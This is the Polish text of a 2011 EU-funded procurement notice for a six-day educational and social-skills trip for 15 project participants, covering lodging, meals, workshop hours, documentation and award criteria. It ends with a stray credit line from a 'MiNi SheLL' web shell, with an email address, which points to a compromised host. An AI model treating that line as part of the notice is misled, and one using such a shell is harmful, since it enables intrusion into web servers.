2. Ubezpieczenie NNW dla każdego uczestnika wyjazdu obejmujące przejazd w obie strony, pobyt na miejscu oraz  pomoc medyczną w razie potrzeby.
3. Zakwaterowanie w wymiarze 6 dób hotelowych. Miejscem zakwaterowania ma być ośrodek lub gospodarstwo agroturystyczne itp. położony w odległości drogowej nie mniejszej niż 90 km i nie większej niż 160 km od siedziby Zamawiającego, dysponujący pokojami 2, 3 i 4  osobowymi  oraz salą umożliwiającą przeprowadzenie zajęć. Każdy pokój z pełnym węzłem sanitarnym tj. umywalka, prysznic, wc. Pożądane jest, aby zakwaterowanie wszystkich uczestników odbyło się w jednym budynku. Jeżeli ośrodek nie dysponuje własnym pełnym zapleczem, należy zapewnić uczestnikom wyjazdu edukacyjno-integracyjnego możliwość korzystania z takiego zaplecza poza ośrodkiem, w pobliskiej lokalizacji zapewniając jednocześnie transport do takiego zaplecza podpisując stosowną umowę z podmiotem udostępniającym takie zaplecze.
4. Pełne wyżywienie w stołówce położonej na terenie ośrodka. Wykonawca zapewnia odpowiednią ilość posiłków w zależności od pory dnia:
śniadanie - do wyboru minimum 2 pozycje z menu lub szwedzki stół,
obiad - składający się z dwóch dań (np. zupa, drugie danie), do wyboru minimum 2 pozycje z menu, deser,
kolacja - do wyboru minimum 2 pozycje z menu lub szwedzki stół.
Dodatkowo wykonawca zapewnia każdego dnia wolny dostęp do napojów (woda mineralna, soki lub kompoty, herbata i kawa).
5. Warunki zakwaterowania uczestników. Wykonawca zapewnia zakwaterowanie wszystkich uczestników wyjazdu w pokojach dwu, trzy i czteroosobowych w zależności od płci.
6. W trakcie wyjazdu edukacyjno-integracyjnego wykonawca zorganizuje warsztaty grupowe kompetencji i umiejętności społecznych dla 15 osób (uczestnicy projektu) w łącznym wymiarze 40 h (godzin dydaktycznych, przyjmuje się, że 1 h = 45 min zegarowych). Celem warsztatów będzie dostarczenie uczestnikom wiedzy na temat komunikacji interpersonalnej, autoprezentacji, asertywności, predyspozycji osobistych ukierunkowanych na aktywność zawodową, prowadzenie zdrowego stylu życia bez używek, a także podniesienie umiejętności funkcjonowania w grupie oraz wzmocnienie aktywności społecznej uczestników.  Warsztaty podzielone są na pięć bloków tematycznych tj.
- Zajęcia wzmacniające poczucie własnej wartości - 5 godzin dydaktycznych,
- Warsztaty z aktywności zawodowej - 10 godzin dydaktycznych,
- Zajęcia z profilaktyki uzależnień - 10 godzin dydaktycznych,
- Zajęcia integracyjne - 5 godzin dydaktycznych,
- Zajęcia z aktywności i liderowania - 10 godzin dydaktycznych.
Sala szkoleniowa powinna znajdować się na terenie ośrodka (miejsce zakwaterowania), powinna być wyposażona w sposób umożliwiający realizację pełnego wymiaru merytorycznego warsztatów dla 15 osób.
W ramach warsztatów Wykonawca zobowiązany jest zapewnić materiały szkoleniowe, dydaktyczne i papiernicze do wykorzystania podczas zajęć i oddać je uczestnikom na własność. W skład kompletu szkoleniowego przekazanego uczestnikom wchodzić powinien co najmniej 1)szczegółowy program dydaktyczny warsztatów, 2) program dydaktyczny ćwiczeń realizowanych podczas zajęć, 3) zeszyt lub notatnik do samodzielnego zapisywania przez uczestnika, 4) długopis lub cienkopis.
Zajęcia prowadzone będą przez min. 1 specjalistę, którego zapewnia wykonawca i który 	spełnia wymagania opisane w pkt VIII.1.2.c zadanie nr 2 - SIWZ. 
Każdy z uczestników zajęć otrzymuje zaświadczenie potwierdzające ukończenie warsztatów, które będzie zawierało obowiązkowe logotypy i informacje o dofinansowaniu projektu ze środków Europejskiego Funduszu Społecznego oraz wykaz tematów z liczbą zrealizowanych godzin i opis nabytych umiejętności.
	Dokumentacja realizowanych warsztatów obejmuje:
dzienniki prowadzonych zajęć (kserokopia potwierdzona przez Wykonawcę za zgodność z oryginałem)
listy obecności uczestników na zajęciach z datą i tematem warsztatów, liczbą godzin zrealizowanych warsztatów wraz z podpisem osoby prowadzącej zajęcia oraz własnoręcznymi podpisami uczestników warsztatów (oryginały) 
listę potwierdzającą odbiór przez uczestników materiałów szkoleniowych wraz 
z własnoręcznymi podpisami uczestników (oryginał). Zamawiający otrzymuje ponadto jeden egzemplarz kompletu szkoleniowego, który otrzymali uczestnicy.
listę potwierdzającą odbiór zaświadczenia ukończenia warsztatów przez każdego uczestnika (oryginał)
zaświadczenia ukończenia warsztatów (kserokopia zaświadczenia przekazanego każdemu uczestnikowi wraz z potwierdzeniem przez Wykonawcę zgodności kopii z oryginałem).
Wykonawca zobowiązuje się do zapoznania z Wytycznymi dotyczącymi oznaczania 	projektów w ramach Programu Operacyjnego Kapitał Ludzki, wersja z 4 lutego 2009 r. lub  nowsza oraz do stosowania przedmiotowych wytycznych w zakresie objętym zamówieniem. Zamawiający najpóźniej w dniu rozpoczęcia wyjazdu uczestników przekazuje Wykonawcy 5 szt. plakatów informacyjnych projektu Żyjemy obok siebie, zacznijmy żyć razem, które Wykonawca 	umieści w miejscu realizacji zamówienia.
7. Wykonawca wykona minimum 10 zdjęć (w formacie cyfrowym na płycie CD lub przekazanej drogą e-mail) dokumentujących realizację zamówienia wraz z przekazaniem praw autorskich do wykorzystania przez Zamawiającego w druku i w wersji elektronicznej.
8. Wykonawca obowiązany jest wyznaczyć osobę, która będzie pełniła funkcję kierownika wyjazdu edukacyjno-integracyjnego.
9. Wykonawca niezwłocznie zawiadomi Zamawiającego o każdym przypadku przerwania wyjazdu edukacyjno-integracyjnego przez jego uczestnika.
10. Wykonawca zapewni kadrę gwarantującą prawidłową organizację wyjazdu  edukacyjno-integracyjnego.
11. Wykonawca zapewni opłacenie opłaty klimatycznej za wszystkich uczestników wyjazdu edukacyjno-integracyjnego, jeśli jest to wymagane.
12. Wykonawca zapewni nieodpłatnie uczestnikom wyjazdu  edukacyjno-integracyjnego program integracyjny, w tym co najmniej:
wieczorek muzyczno-taneczny ze wspólną zabawą zawierający poczęstunek (zastępujący jedną kolację), zajęcia poznawcze- integracyjne umożliwiające wszystkim uczestnikom zapoznanie się ze sobą nawzajem, zapoznanie się z programem i warunkami pobytu, integrację w grupie.
grill (lub ognisko) w wybrany dzień pobytu (zastępujący jedną kolację), z muzyką,  podczas którego przygotowany będzie poczęstunek i zapewnione napoje wyłącznie bezalkoholowe. 
W przypadku warunków atmosferycznych uniemożliwiających organizację tego typu imprezy Wykonawca zapewni analogiczną imprezę w pomieszczeniu zamkniętym (np. wieczór z muzyką i poczęstunkiem oraz programem rekreacyjnym).
realizację jednej pieszej wycieczki krajoznawczej, turystycznej po szlaku turystycznym, ścieżce przyrodniczej lub edukacyjnej w okolicy wraz z przewodnikiem. Jeśli w najbliższej okolicy nie ma atrakcyjnego turystycznie miejsca spacerowego to Wykonawca zapewnia przejazd wszystkich uczestników na wycieczkę do atrakcyjnego turystycznie miejsca, gdzie zrealizowana będzie piesza wycieczka krajoznawcza. W przypadku, gdy warunki atmosferyczne uniemożliwią realizację tego typu wycieczki, Wykonawca opcjonalnie zrealizuje wizytę w muzeum lub innym miejscu szczególnie interesującym kulturalnie i historycznie dla danej okolicy. W ramach wizyty w muzeum Wykonawca zapewnia (w razie potrzeby) dojazd wszystkich uczestników, bilety wstępu, zakup wybranej pamiątki muzealnej (np. figurka, obrazek, miniaturka zabytkowego przedmiotu, breloczek, plakietka, kartka pocztowa itp.)
Oprócz programu zorganizowanego Wykonawca zapewnia uczestnikom możliwość podjęcia aktywności rekreacyjno-sportowej (np. sprzęt sportowy typu rakietki do badmintona, stół i rakiety do tenisa stołowego, piłki do gier zespołowych), możliwość skorzystania z sali telewizyjnej, zapewnienie pomieszczenia, gdzie uczestnicy mogą prowadzić gry i zabawy oraz spędzać czas wolny.
13. Zakwaterowanie oraz wszelkie koszty związane z realizacją usług przez prowadzących ponosi Wykonawca.
14. Zamawiający zastrzega sobie prawo do zmiany liczby uczestników w sytuacjach niezależnych od Zamawiającego, których nie mógł przewidzieć w chwili zawarcia umowy np. choroba uczestnika. 
O zaistniałej sytuacji Zamawiający niezwłocznie powiadomi Wykonawcę.
15. Wszelkie rozliczenia końcowe między Zamawiającym a Wykonawcą zrealizowanych usług a w szczególności rozliczenia w sytuacjach powodujących zmianę liczby uczestników dokonane zostaną na podstawie cen jednostkowych określonych w formularzu ofertowym przez Wykonawcę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Wiedza i doświadczenie Wykonawcy - 20</li>
<li>3. Wiedza i doświadczenie Trenerów - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com